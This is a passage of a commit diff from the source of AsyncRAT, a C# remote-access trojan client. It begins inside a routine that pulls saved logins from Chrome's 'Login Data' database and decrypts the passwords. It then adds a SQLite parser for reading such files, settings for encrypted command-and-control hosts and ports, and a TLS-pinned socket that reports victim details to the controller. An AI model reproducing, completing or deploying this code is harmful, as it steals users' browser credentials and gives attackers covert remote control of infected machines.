if (!File.Exists(AppData + @"\Local\Google\Chrome\User Data\Default\Login Data"))
continue;
SQLiteHandler sql = new SQLiteHandler(AppData + @"\Local\Google\Chrome\User Data\Default\Login Data");
try
{
sql.ReadTable("logins");
}
catch { }
for (int i = 0; i <= sql.GetRowCount() - 1; i++)
{
string url = sql.GetValue(i, "origin_url");
string username = sql.GetValue(i, "username_value");
string password_crypted = sql.GetValue(i, "password_value");
string password = string.Empty;
if (!string.IsNullOrEmpty(password_crypted))
{
password = Decrypt(Encoding.Default.GetBytes(password_crypted));
}
else
{
password = "";
}
// Format like this:
// Type \n URL \n User \n Pass \n\n
Pass += "Chrome\n" + url + "\n" + username + "\n" + password + "\n\n";
}
}
catch (Exception eax)
{
Console.WriteLine(eax.ToString());
}
}
}
catch { }
}
}
}

473
AsyncRAT-C#/Client/Recovery/SQLiteHandler.cs Normal file
View File

@ -0,0 +1,473 @@
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
namespace Client.Recovery
{
public class SQLiteHandler
{
private byte[] db_bytes;
private ulong encoding;
private string[] field_names;
private sqlite_master_entry[] master_table_entries;
private ushort page_size;
private byte[] SQLDataTypeSize = new byte[] { 0, 1, 2, 3, 4, 6, 8, 8, 0, 0 };
private table_entry[] table_entries;
public SQLiteHandler(string baseName)
{
if (File.Exists(baseName))
{
FileSystem.FileOpen(1, baseName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1);
string str = Strings.Space((int)FileSystem.LOF(1));
FileSystem.FileGet(1, ref str, -1L, false);
FileSystem.FileClose(new int[] { 1 });
this.db_bytes = Encoding.Default.GetBytes(str);
if (Encoding.Default.GetString(this.db_bytes, 0, 15).CompareTo("SQLite format 3") != 0)
{
throw new Exception("Not a valid SQLite 3 Database File");
}
if (this.db_bytes[0x34] != 0)
{
throw new Exception("Auto-vacuum capable database is not supported");
}
//if (decimal.Compare(new decimal(this.ConvertToInteger(0x2c, 4)), 4M) >= 0)
//{
// throw new Exception("No supported Schema layer file-format");
//}
this.page_size = (ushort)this.ConvertToInteger(0x10, 2);
this.encoding = this.ConvertToInteger(0x38, 4);
if (decimal.Compare(new decimal(this.encoding), decimal.Zero) == 0)
{
this.encoding = 1L;
}
this.ReadMasterTable(100L);
}
}
private ulong ConvertToInteger(int startIndex, int Size)
{
if ((Size > 8) | (Size == 0))
{
return 0L;
}
ulong num2 = 0L;
int num4 = Size - 1;
for (int i = 0; i <= num4; i++)
{
num2 = (num2 << 8) | this.db_bytes[startIndex + i];
}
return num2;
}
private long CVL(int startIndex, int endIndex)
{
endIndex++;
byte[] buffer = new byte[8];
int num4 = endIndex - startIndex;
bool flag = false;
if ((num4 == 0) | (num4 > 9))
{
return 0L;
}
if (num4 == 1)
{
buffer[0] = (byte)(this.db_bytes[startIndex] & 0x7f);
return BitConverter.ToInt64(buffer, 0);
}
if (num4 == 9)
{
flag = true;
}
int num2 = 1;
int num3 = 7;
int index = 0;
if (flag)
{
buffer[0] = this.db_bytes[endIndex - 1];
endIndex--;
index = 1;
}
int num7 = startIndex;
for (int i = endIndex - 1; i >= num7; i += -1)
{
if ((i - 1) >= startIndex)
{
buffer[index] = (byte)((((byte)(this.db_bytes[i] >> ((num2 - 1) & 7))) & (((int)0xff) >> num2)) | ((byte)(this.db_bytes[i - 1] << (num3 & 7))));
num2++;
index++;
num3--;
}
else if (!flag)
{
buffer[index] = (byte)(((byte)(this.db_bytes[i] >> ((num2 - 1) & 7))) & (((int)0xff) >> num2));
}
}
return BitConverter.ToInt64(buffer, 0);
}
public int GetRowCount()
{
return this.table_entries.Length;
}
public string[] GetTableNames()
{
string[] strArray2 = null;
int index = 0;
int num3 = this.master_table_entries.Length - 1;
for (int i = 0; i <= num3; i++)
{
if (this.master_table_entries[i].item_type == "table")
{
strArray2 = (string[])Utils.CopyArray((Array)strArray2, new string[index + 1]);
strArray2[index] = this.master_table_entries[i].item_name;
index++;
}
}
return strArray2;
}
public string GetValue(int row_num, int field)
{
if (row_num >= this.table_entries.Length)
{
return null;
}
if (field >= this.table_entries[row_num].content.Length)
{
return null;
}
return this.table_entries[row_num].content[field];
}
public string GetValue(int row_num, string field)
{
int num = -1;
int length = this.field_names.Length - 1;
for (int i = 0; i <= length; i++)
{
if (this.field_names[i].ToLower().CompareTo(field.ToLower()) == 0)
{
num = i;
break;
}
}
if (num == -1)
{
return null;
}
return this.GetValue(row_num, num);
}
private int GVL(int startIndex)
{
if (startIndex > this.db_bytes.Length)
{
return 0;
}
int num3 = startIndex + 8;
for (int i = startIndex; i <= num3; i++)
{
if (i > (this.db_bytes.Length - 1))
{
return 0;
}
if ((this.db_bytes[i] & 0x80) != 0x80)
{
return i;
}
}
return (startIndex + 8);
}
private bool IsOdd(long value)
{
return ((value & 1L) == 1L);
}
private void ReadMasterTable(ulong Offset)
{
if (this.db_bytes[(int)Offset] == 13)
{
ushort num2 = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One));
int length = 0;
if (this.master_table_entries != null)
{
length = this.master_table_entries.Length;
this.master_table_entries = (sqlite_master_entry[])Utils.CopyArray((Array)this.master_table_entries, new sqlite_master_entry[(this.master_table_entries.Length + num2) + 1]);
}
else
{
this.master_table_entries = new sqlite_master_entry[num2 + 1];
}
int num13 = num2;
for (int i = 0; i <= num13; i++)
{
ulong num = this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2);
if (decimal.Compare(new decimal(Offset), 100M) != 0)
{
num += Offset;
}
int endIndex = this.GVL((int)num);
long num7 = this.CVL((int)num, endIndex);
int num6 = this.GVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)));
this.master_table_entries[length + i].row_id = this.CVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num6);
num = Convert.ToUInt64(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(num6), new decimal(num))), decimal.One));
endIndex = this.GVL((int)num);
num6 = endIndex;
long num5 = this.CVL((int)num, endIndex);
long[] numArray = new long[5];
int index = 0;
do
{
endIndex = num6 + 1;
num6 = this.GVL(endIndex);
numArray[index] = this.CVL(endIndex, num6);
if (numArray[index] > 9L)
{
if (this.IsOdd(numArray[index]))
{
numArray[index] = (long)Math.Round((double)(((double)(numArray[index] - 13L)) / 2.0));
}
else
{
numArray[index] = (long)Math.Round((double)(((double)(numArray[index] - 12L)) / 2.0));
}
}
else
{
numArray[index] = this.SQLDataTypeSize[(int)numArray[index]];
}
index++;
}
while (index <= 4);
if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0)
{
this.master_table_entries[length + i].item_type = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]);
}
else if (decimal.Compare(new decimal(this.encoding), 2M) == 0)
{
this.master_table_entries[length + i].item_type = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]);
}
else if (decimal.Compare(new decimal(this.encoding), 3M) == 0)
{
this.master_table_entries[length + i].item_type = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(new decimal(num), new decimal(num5))), (int)numArray[0]);
}
if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0)
{
this.master_table_entries[length + i].item_name = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]);
}
else if (decimal.Compare(new decimal(this.encoding), 2M) == 0)
{
this.master_table_entries[length + i].item_name = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]);
}
else if (decimal.Compare(new decimal(this.encoding), 3M) == 0)
{
this.master_table_entries[length + i].item_name = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0]))), (int)numArray[1]);
}
this.master_table_entries[length + i].root_num = (long)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2]))), (int)numArray[3]);
if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0)
{
this.master_table_entries[length + i].sql_statement = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]);
}
else if (decimal.Compare(new decimal(this.encoding), 2M) == 0)
{
this.master_table_entries[length + i].sql_statement = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]);
}
else if (decimal.Compare(new decimal(this.encoding), 3M) == 0)
{
this.master_table_entries[length + i].sql_statement = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(decimal.Add(decimal.Add(decimal.Add(new decimal(num), new decimal(num5)), new decimal(numArray[0])), new decimal(numArray[1])), new decimal(numArray[2])), new decimal(numArray[3]))), (int)numArray[4]);
}
}
}
else if (this.db_bytes[(int)Offset] == 5)
{
ushort num11 = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One));
int num14 = num11;
for (int j = 0; j <= num14; j++)
{
ushort startIndex = (ushort)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(j * 2))), 2);
if (decimal.Compare(new decimal(Offset), 100M) == 0)
{
this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(startIndex, 4)), decimal.One), new decimal(this.page_size))));
}
else
{
this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)(Offset + startIndex), 4)), decimal.One), new decimal(this.page_size))));
}
}
this.ReadMasterTable(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)), decimal.One), new decimal(this.page_size))));
}
}
public bool ReadTable(string TableName)
{
int index = -1;
int length = this.master_table_entries.Length - 1;
for (int i = 0; i <= length; i++)
{
if (this.master_table_entries[i].item_name.ToLower().CompareTo(TableName.ToLower()) == 0)
{
index = i;
break;
}
}
if (index == -1)
{
return false;
}
string[] strArray = this.master_table_entries[index].sql_statement.Substring(this.master_table_entries[index].sql_statement.IndexOf("(") + 1).Split(new char[] { ',' });
int num6 = strArray.Length - 1;
for (int j = 0; j <= num6; j++)
{
strArray[j] = (strArray[j]).TrimStart();
int num4 = strArray[j].IndexOf(" ");
if (num4 > 0)
{
strArray[j] = strArray[j].Substring(0, num4);
}
if (strArray[j].IndexOf("UNIQUE") == 0)
{
break;
}
this.field_names = (string[])Utils.CopyArray((Array)this.field_names, new string[j + 1]);
this.field_names[j] = strArray[j];
}
return this.ReadTableFromOffset((ulong)((this.master_table_entries[index].root_num - 1L) * this.page_size));
}
private bool ReadTableFromOffset(ulong Offset)
{
if (this.db_bytes[(int)Offset] == 13)
{
int num2 = Convert.ToInt32(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One));
int length = 0;
if (this.table_entries != null)
{
length = this.table_entries.Length;
this.table_entries = (table_entry[])Utils.CopyArray((Array)this.table_entries, new table_entry[(this.table_entries.Length + num2) + 1]);
}
else
{
this.table_entries = new table_entry[num2 + 1];
}
int num16 = num2;
for (int i = 0; i <= num16; i++)
{
record_header_field[] _fieldArray = null;
ulong num = this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 8M), new decimal(i * 2))), 2);
if (decimal.Compare(new decimal(Offset), 100M) != 0)
{
num += Offset;
}
int endIndex = this.GVL((int)num);
long num9 = this.CVL((int)num, endIndex);
int num8 = this.GVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)));
this.table_entries[length + i].row_id = this.CVL(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(endIndex), new decimal(num))), decimal.One)), num8);
num = Convert.ToUInt64(decimal.Add(decimal.Add(new decimal(num), decimal.Subtract(new decimal(num8), new decimal(num))), decimal.One));
endIndex = this.GVL((int)num);
num8 = endIndex;
long num7 = this.CVL((int)num, endIndex);
long num10 = Convert.ToInt64(decimal.Add(decimal.Subtract(new decimal(num), new decimal(endIndex)), decimal.One));
for (int j = 0; num10 < num7; j++)
{
_fieldArray = (record_header_field[])Utils.CopyArray((Array)_fieldArray, new record_header_field[j + 1]);
endIndex = num8 + 1;
num8 = this.GVL(endIndex);
_fieldArray[j].type = this.CVL(endIndex, num8);
if (_fieldArray[j].type > 9L)
{
if (this.IsOdd(_fieldArray[j].type))
{
_fieldArray[j].size = (long)Math.Round((double)(((double)(_fieldArray[j].type - 13L)) / 2.0));
}
else
{
_fieldArray[j].size = (long)Math.Round((double)(((double)(_fieldArray[j].type - 12L)) / 2.0));
}
}
else
{
_fieldArray[j].size = this.SQLDataTypeSize[(int)_fieldArray[j].type];
}
num10 = (num10 + (num8 - endIndex)) + 1L;
}
this.table_entries[length + i].content = new string[(_fieldArray.Length - 1) + 1];
int num4 = 0;
int num17 = _fieldArray.Length - 1;
for (int k = 0; k <= num17; k++)
{
if (_fieldArray[k].type > 9L)
{
if (!this.IsOdd(_fieldArray[k].type))
{
if (decimal.Compare(new decimal(this.encoding), decimal.One) == 0)
{
this.table_entries[length + i].content[k] = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size);
}
else if (decimal.Compare(new decimal(this.encoding), 2M) == 0)
{
this.table_entries[length + i].content[k] = Encoding.Unicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size);
}
else if (decimal.Compare(new decimal(this.encoding), 3M) == 0)
{
this.table_entries[length + i].content[k] = Encoding.BigEndianUnicode.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size);
}
}
else
{
this.table_entries[length + i].content[k] = Encoding.Default.GetString(this.db_bytes, Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size);
}
}
else
{
this.table_entries[length + i].content[k] = Conversions.ToString(this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(num), new decimal(num7)), new decimal(num4))), (int)_fieldArray[k].size));
}
num4 += (int)_fieldArray[k].size;
}
}
}
else if (this.db_bytes[(int)Offset] == 5)
{
ushort num14 = Convert.ToUInt16(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 3M)), 2)), decimal.One));
int num18 = num14;
for (int m = 0; m <= num18; m++)
{
ushort num13 = (ushort)this.ConvertToInteger(Convert.ToInt32(decimal.Add(decimal.Add(new decimal(Offset), 12M), new decimal(m * 2))), 2);
this.ReadTableFromOffset(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger((int)(Offset + num13), 4)), decimal.One), new decimal(this.page_size))));
}
this.ReadTableFromOffset(Convert.ToUInt64(decimal.Multiply(decimal.Subtract(new decimal(this.ConvertToInteger(Convert.ToInt32(decimal.Add(new decimal(Offset), 8M)), 4)), decimal.One), new decimal(this.page_size))));
}
return true;
}
[StructLayout(LayoutKind.Sequential)]
private struct record_header_field
{
public long size;
public long type;
}
[StructLayout(LayoutKind.Sequential)]
private struct sqlite_master_entry
{
public long row_id;
public string item_type;
public string item_name;
public string astable_name;
public long root_num;
public string sql_statement;
}
[StructLayout(LayoutKind.Sequential)]
private struct table_entry
{
public long row_id;
public string[] content;
}
}
}

46
AsyncRAT-C#/Client/Settings.cs
View File

@ -1,23 +1,38 @@
using Client.Cryptography;
using System;
using System.IO;
using System.Security.Cryptography;
using System.Security.Cryptography.X509Certificates;
using System.Text;
namespace Client
{
public static class Settings
{
#if DEBUG
public static string Ports = "6606";
public static string Host = "127.0.0.1";
public static string Hosts = "127.0.0.1";
public static string Version = "AsyncRAT 0.4.7";
public static string Install = "false";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%AppData%"), "Payload.exe");
public static string Password = "NYAN CAT";
public static string Key = "NYAN CAT";
public static string MTX = "%MTX%";
#if DEBUG
public static string Certificate = "%Certificate%";
public static string Serversignature = "%Serversignature%";
public static X509Certificate2 ServerCertificate;
public static string Anti = "false";
public static Aes256 aes256 = new Aes256(Password);
public static Aes256 aes256 = new Aes256(Key);
#else
public static string Ports = "%Ports%";
public static string Hosts = "%Hosts%";
public static string Version = "AsyncRAT 0.4.8";
public static string Install = "%Install%";
public static string ClientFullPath = Path.Combine(Environment.ExpandEnvironmentVariables("%Folder%"), "%File%");
public static string Key = "%Key%";
public static string MTX = "%MTX%";
public static string Certificate = "%Certificate%";
public static string Serversignature = "%Serversignature%";
public static X509Certificate2 ServerCertificate;
public static readonly string Anti = "%Anti%";
public static Aes256 aes256;
#endif
@ -30,13 +45,28 @@ namespace Client
#endif
try
{
Password = Encoding.UTF8.GetString(Convert.FromBase64String(Password));
aes256 = new Aes256(Password);
Key = Encoding.UTF8.GetString(Convert.FromBase64String(Key));
aes256 = new Aes256(Key);
Ports = aes256.Decrypt(Ports);
Host = aes256.Decrypt(Host);
return true;
Hosts = aes256.Decrypt(Hosts);
Serversignature = aes256.Decrypt(Serversignature);
ServerCertificate = new X509Certificate2(Convert.FromBase64String(aes256.Decrypt(Certificate)));
return VerifyHash();
}
catch { return false; }
}
private static bool VerifyHash()
{
try
{
var csp = (RSACryptoServiceProvider)ServerCertificate.PublicKey.Key;
return csp.VerifyHash(Sha256.ComputeHash(Encoding.UTF8.GetBytes(Key)), CryptoConfig.MapNameToOID("SHA256"), Convert.FromBase64String(Serversignature));
}
catch (Exception)
{
return false;
}
}
}
}

43
AsyncRAT-C#/Client/Sockets/ClientSocket.cs
View File

@ -9,6 +9,9 @@ using System.Net.Sockets;
using System.Threading;
using System.Text;
using System.Security.Principal;
using System.Net.Security;
using System.Security.Authentication;
using System.Security.Cryptography.X509Certificates;
// │ Author : NYAN CAT
// │ Name : Nyan Socket v0.1
@ -21,6 +24,7 @@ namespace Client.Sockets
public static class ClientSocket
{
public static Socket Client { get; set; }
public static SslStream SslClient { get; set; }
private static byte[] Buffer { get; set; }
private static long Buffersize { get; set; }
private static Timer Tick { get; set; }
@ -39,15 +43,20 @@ namespace Client.Sockets
ReceiveBufferSize = 50 * 1024,
SendBufferSize = 50 * 1024,
};
Client.Connect(Convert.ToString(Settings.Host.Split(',')[new Random().Next(Settings.Host.Split(',').Length)]),
Client.Connect(Convert.ToString(Settings.Hosts.Split(',')[new Random().Next(Settings.Hosts.Split(',').Length)]),
Convert.ToInt32(Settings.Ports.Split(',')[new Random().Next(Settings.Ports.Split(',').Length)]));
if (Client.Connected)
{
Debug.WriteLine("Connected!");
IsConnected = true;
SslClient = new SslStream(new NetworkStream(Client, true), false, ValidateServerCertificate);
SslClient.AuthenticateAsClient(Client.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false);
Buffer = new byte[4];
MS = new MemoryStream();
Send(SendInfo());
Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000));
Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
}
}
catch
{
@ -56,12 +65,21 @@ namespace Client.Sockets
}
}
private static bool ValidateServerCertificate(object sender, X509Certificate certificate, X509Chain chain, SslPolicyErrors sslPolicyErrors)
{
#if DEBUG
return true;
#endif
return Settings.ServerCertificate.Equals(certificate);
}
public static void Reconnect()
{
try
{
Tick?.Dispose();
SslClient?.Dispose();
Client?.Dispose();
MS?.Dispose();
}
@ -81,7 +99,7 @@ namespace Client.Sockets
Environment.Is64BitOperatingSystem.ToString().Replace("True", "64bit").Replace("False", "32bit");
msgpack.ForcePathObject("Path").AsString = Process.GetCurrentProcess().MainModule.FileName;
msgpack.ForcePathObject("Version").AsString = Settings.Version;
msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false","User");
msgpack.ForcePathObject("Admin").AsString = new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator).ToString().ToLower().Replace("true", "Administrator").Replace("false", "User");
TheCPUCounter.NextValue();
msgpack.ForcePathObject("Performance").AsString = $"CPU {(int)TheCPUCounter.NextValue()}% RAM {(int)TheMemCounter.NextValue()}%";
return msgpack.Encode2Bytes();
@ -96,11 +114,12 @@ namespace Client.Sockets
IsConnected = false;
return;
}
int recevied = Client.EndReceive(ar);
if (recevied == 4)
int recevied = SslClient.EndRead(ar);
if (recevied > 0)
{
MS.Write(Buffer, 0, recevied);
if (MS.Length == 4)
{
Buffersize = BitConverter.ToInt32(MS.ToArray(), 0);
Debug.WriteLine("/// Client Buffersize " + Buffersize.ToString() + " Bytes ///");
MS.Dispose();
@ -110,7 +129,7 @@ namespace Client.Sockets
Buffer = new byte[Buffersize];
while (MS.Length != Buffersize)
{
int rc = Client.Receive(Buffer, 0, Buffer.Length, SocketFlags.None);
int rc = SslClient.Read(Buffer, 0, Buffer.Length);
if (rc == 0)
{
IsConnected = false;
@ -129,7 +148,8 @@ namespace Client.Sockets
else
Buffer = new byte[Buffersize - MS.Length];
}
Client.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, ReadServertData, null);
}
SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null);
}
else
{
@ -158,12 +178,13 @@ namespace Client.Sockets
if (msg == null) return;
byte[] buffer = Settings.aes256.Encrypt(msg);
byte[] buffer = msg;
byte[] buffersize = BitConverter.GetBytes(buffer.Length);
Client.Poll(-1, SelectMode.SelectWrite);
Client.Send(buffersize, 0, buffersize.Length, SocketFlags.None);
Client.Send(buffer, 0, buffer.Length, SocketFlags.None);
SslClient.Write(buffersize, 0, buffersize.Length);
SslClient.Write(buffer, 0, buffer.Length);
SslClient.Flush();
}
catch
{